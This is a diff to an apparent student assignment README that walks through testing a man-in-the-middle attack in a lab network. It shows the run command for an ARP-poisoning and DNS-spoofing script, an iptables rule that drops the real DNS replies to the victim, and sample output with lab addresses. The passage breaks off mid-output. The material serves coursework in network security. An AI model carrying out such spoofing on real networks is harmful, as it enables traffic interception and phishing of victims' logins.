NNPotters/2IC80-Assignment/README.md

 ## Testing

-1. On victim device, run: `nslookup www.fakelogin.net`.
+1. On the victim device, run: `nslookup www.fakelogin.net`.
 This will give this output (not spoofed, `192.168.88.1` is the **GATEWAY_IP**):
     ```
     Server:  router.lan
     Address:  192.168.88.1

     *** router.lan can't find www.fakelogin.net: Non-existent domain
     ```
-2. On attaker device, the attack is ran with: `sudo python3 mitm_spoofer.py` Program output:
+2. On the attacker device, the attack is run with: `sudo python3 mitm_spoofer.py` Program output:
     ```
     [*] Starting MITM Attack on Victim: 192.168.88.227
-    [*] The gateway of this network is at IP address 192.168.88.1 and MAC address 48:a9:8a:45:3a:5a.
+    [ARP Poison] The gateway of this network is at IP address 192.168.88.1 and MAC address 48:a9:8a:45:3a:5a.
-    [*] The victim at IP address 192.168.88.227 is at MAC address e0:0a:f6:b1:4e:0d.
+    [ARP Poison] The victim at IP address 192.168.88.227 is at MAC address e0:0a:f6:b1:4e:0d.
     [*] IP Forwarding enabled.
     [A] Executing IPTables command: sudo iptables -A FORWARD -p udp -s 192.168.88.1 --sport 53 -d 192.168.88.227 -j DROP
-    [*] DNS response dropping rule installed to win the race.
+    [DNS Spoof] DNS response dropping rule installed to win the race.
-    [*] ARP Poisoning started.
+    [ARP Poison] ARP Poisoning started.
 MiTM position established.
-    [*] Starting DNS sniffer on interface ens33
+    [DNS Spoof] Starting DNS sniffer on interface ens33
     ```
-3. On victim device, run: `nslookup www.fakelogin.net`.
+3. On the victim device, run: `nslookup www.fakelogin.net`.
 This will give this output (spoofed, `192.168.88.226` is the **ATTACKER_IP**):
     ```
     DNS request timed out.
         timeout was 2 seconds.